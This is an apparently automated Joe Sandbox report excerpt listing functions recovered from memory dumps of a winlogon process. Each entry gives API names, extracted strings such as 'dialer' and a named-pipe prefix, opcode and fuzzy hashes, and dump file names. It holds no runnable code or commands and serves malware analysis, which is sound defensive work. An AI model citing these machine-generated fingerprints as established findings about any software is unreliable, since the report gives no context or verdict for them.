                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction ID: fb0b219c5a3f278c8c4be7db907598bc1cd6189e151ec6c18a9f6efa96547db1
                                                                          • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction Fuzzy Hash: 48E15A73624B82CAEB609B65D4803DDB7E0FB55798F140126EE8D57B99CF38D481CB02
                                                                          Function 000001E858959944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284181890.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction ID: ea3d8d01707ad5d94a13b4fba9cf6eb05f996a68f408e0993dfcc1eae4dccdcf
                                                                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction Fuzzy Hash: AFE16972624B81CAFB609B65E4813DDB7A4FF85B99F100126EE8D57B9ACF34C591CB00
                                                                          Function 000001E85898F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeLibraryProc
                                                                          • String ID: api-ms-$ext-ms-
                                                                          • API String ID: 3013587201-537541572
                                                                          • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction ID: 44c234c9404ffe7b5e1619124c70eb274fb59fe55c9541b10c09b14d45380197
                                                                          • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction Fuzzy Hash: 2C410032331A92C1EA16DB66E8087DEB391FF49BE0F19513B9D0E97786EE38C4458700
                                                                          Function 000001E85898104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                          • String ID: d
                                                                          • API String ID: 3743429067-2564639436
                                                                          • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction ID: 9981850cc48d31037741c2cded26c72f9a92758d62ae1b8330bcbb02fb765734
                                                                          • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction Fuzzy Hash: 5F414F73224BC4C6E760DF61E44479EB7A1F789B98F44812ADE8A07B58DF38C585CB40
                                                                          Function 000001E85898D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FlsGetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D087
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D0A6
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D0CE
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D0DF
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D0F0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID: 1%$Y%
                                                                          • API String ID: 3702945584-1395475152
                                                                          • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction ID: 9c311fea4b2fa3c9ab43cbea4d372c8830d6ac0f2b4a448fbd82eec820a9dce2
                                                                          • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction Fuzzy Hash: A8110A717242C6C1FA68AB25D9513FDF1416FC47F0F546336AC3E476EADE68C4028A00
                                                                          Function 000001E858987510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID:
                                                                          • API String ID: 190073905-0
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: f82d139e0262af235c5c503c080292d7917c2a0aa74f472ae0aed1caa77cd681
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: 5F816B396202C3EAFB50AB65E8813EDF691AF85780F544437AD0DA7796EE38C8458F11
                                                                          Function 000001E858989DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                          • String ID: api-ms-
                                                                          • API String ID: 2559590344-2084034818
                                                                          • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                          • Instruction ID: ed1d6103eff1dcc676994d656ad2f911c5872803e8dc8710478f2b646a537078
                                                                          • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                          • Instruction Fuzzy Hash: F831A4313226C2E2EE229B42E4407EDB694BF48BA0F5905379D5E47792EF39C4658B10
                                                                          Function 000001E858993DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                          • String ID: CONOUT$
                                                                          • API String ID: 3230265001-3130406586
                                                                          • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction ID: 848c5f808f98b7fe64fe1be9f14dffa162bf3ffb4f70aadf000dfa4e6251c1b3
                                                                          • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction Fuzzy Hash: C6115B31320AC0C6E7619B56E84439DB6A1FB88FE4F444226EE5E877A4DF38C8148744
                                                                          Function 000001E858982F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID: dialer
                                                                          • API String ID: 756756679-3528709123
                                                                          • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction ID: c1fd6422857e38418c878c4cd41444f40647f04957361f5aedf899a272e96910
                                                                          • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction Fuzzy Hash: 22315A32721B92C2EA15DF96E5407ADF7A1BF44B84F0841329E4D47B59EF38C4A1CB00
                                                                          Function 000001E85898CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 2506987500-0
                                                                          • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction ID: cd1afe50f7e6de5fdb75e3b85d99f54b8b5774328d87a634973043da6fa4d35a
                                                                          • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction Fuzzy Hash: 061159312212C6C2FA69A721D5953BDF2426F887F4F141736AC3F876EADE6884018A00
                                                                          Function 000001E85898199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                          • String ID:
                                                                          • API String ID: 517849248-0
                                                                          • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction ID: 60db19895ce507a708008e45d9c0298ffec254aa5bc9d4092071c0d004566a38
                                                                          • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction Fuzzy Hash: 28011731320AC1C2EB64DB52E89879DB3A6FB88BC4F884036DE5E53755DE38C989C740
                                                                          Function 000001E8589836C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                          • String ID:
                                                                          • API String ID: 449555515-0
                                                                          • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction ID: 18b328c97b5f9e14fffcfa9212a447ac2abda381c2e5647efa8e85a057c85cab
                                                                          • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction Fuzzy Hash: 19011775321BC0C6EB259B62E84879DB2A1BF49B86F04443ACD4E07B65EF3DC1488B00
                                                                          Function 000001E858988FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 2395640692-629598281
                                                                          • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                          • Instruction ID: c300b2b6b54622bad3c43c23df103e30e38a6bb1438ec9a2dd89e032c6842fde
                                                                          • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                          • Instruction Fuzzy Hash: 53518932729683CAEB54CB15E848B9DB7A6FB44B88F508536DE4B47788DF39C841CB00
                                                                          Function 000001E858981A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: FinalHandleNamePathlstrlen
                                                                          • String ID: \\?\
                                                                          • API String ID: 2719912262-4282027825
                                                                          • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction ID: d0bcd0cf9b4692289a878d77c8ac4738952449dce6fe18ad4e1a7071ab5e44cd
                                                                          • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction Fuzzy Hash: D4F03C723246C1D2EB609B61F9C479DB761FB88BC8F844032DE4D46954DE2CC68DCB00
                                                                          Function 000001E85898BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 4061214504-1276376045
                                                                          • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction ID: e6b40846573bec2309256a1e3779184d66e370f070609bbf47c065b346f7c57b
                                                                          • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction Fuzzy Hash: A2F06271221685D1FB108F29E84539DB321EF857A1F54062ADE6E452E4CF2CC045C700
                                                                          Function 000001E858983044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CombinePath
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3422762182-91387939
                                                                          • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction ID: 177804a8e33fc8a1ffb9e6d06ac6c2892e3a9ed2a31dc03627c06d5a34e3f628
                                                                          • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction Fuzzy Hash: A4F0F874624BC5D2EA148F53F9551ADB662AF48FD0F489132EE4E47B18DE2CC4858700
                                                                          Function 000001E858985710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: 4678552974c2dc3df73a17a4dcf6fd2c3d7689486890f7c1069e8590a64c51b2
                                                                          • Instruction ID: ff1100847cf1c0e0aadc7ec0e970ba072bd13cc79387902f55229e6ec2abdf55
                                                                          • Opcode Fuzzy Hash: 4678552974c2dc3df73a17a4dcf6fd2c3d7689486890f7c1069e8590a64c51b2
                                                                          • Instruction Fuzzy Hash: 0361C436629A85CAE760DB55E45039EB7A0FB88784F504127EE8E87BA8DF7CC444CF00
                                                                          Function 000001E8589C3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284708688.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: b4ee51cf0a1e5aea1822e43a26c047e5dcf7f4fbb0b99cff55914cd4d144b702
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: 7511E932AB0ED1D2FAA42528E4523EDBF806F59374F49873BAD7E067D6CE26C8417101
                                                                          Function 000001E858994104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: 63986d8d169832ca2b3c9ff94d929ac1109ad7e490c18855dc707efbf0d460dd
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: 5D11A3B2B30AD092F67A5569D4653EDB1477F783B8F090636AD7E077D6EE24C8414201
                                                                          Function 000001E858963504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284181890.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: 13a26281ade054cd1280fdbce72e43605aafa02c3cf2d887f28f1c2fac503938
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: D511A332A30AD191FA64192AE4413EDB1906F59374FD8873BBD6E076E6CE38C8417100
                                                                          Function 000001E8589BF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284708688.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                          • API String ID: 3215553584-4202648911
                                                                          • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction ID: 45fbb07566537809df07c08353ba596d2c45bc6c88eb3f332a9267d3a220cd63
                                                                          • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction Fuzzy Hash: A661C6766286C0CEFA658BA9E5443EEFAA0EF85746F508837CE0E177A5DF34C8458300
                                                                          Function 000001E85895F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284181890.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                          • API String ID: 3215553584-4202648911
                                                                          • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction ID: bbb57aa9e3b830d463c4fe85b52b4203214c9bc4de7028ccc68d76f93c744b6c
                                                                          • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction Fuzzy Hash: 2761A2766206C0C2FA659B65E5443EEFAA1EF867A6F544837CE0E17BA4DF34C8458300
                                                                          Function 000001E85898AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CallEncodePointerTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3544855599-2084237596
                                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction ID: bb76fc1650d308761c410147ea84cb38f2e16afbcf0730215f2385a251eb584a
                                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction Fuzzy Hash: 6C614633610A85CAEB209F65D4803DDB7A1FB48B88F044226EE4E17B99DF78C595CB02
                                                                          Function 000001E8589BA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284708688.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: b8cb1cdd645de17ac90d150e5576baa1f770b257ea5295feeb99f43c7e10e3bf
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: A9517A322292C0CEEB648B65D45439CB7E0FB55B96F188227DE9D87B95CF39D490C702
                                                                          Function 000001E85898AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: 49808e8ca0374573422c17999fa92c520f6827b0ca759f7661e9c90c8d8cbcb6
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: C85138732206C2CBEB648B25D58439DB7E0EB54B99F184126DE9D87A96CF38D491CF02
                                                                          Function 000001E85895A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284181890.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: 0ad0f10a0311de8fe70e4511306a68505f179f6318197c4e8bd1820910d7e08b
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: DF517E322242C1CAEB648B25E44439DB7E0FF55B9AF184127DE9D87B95CF38D491CB0A
                                                                          Function 000001E8589B8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284708688.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
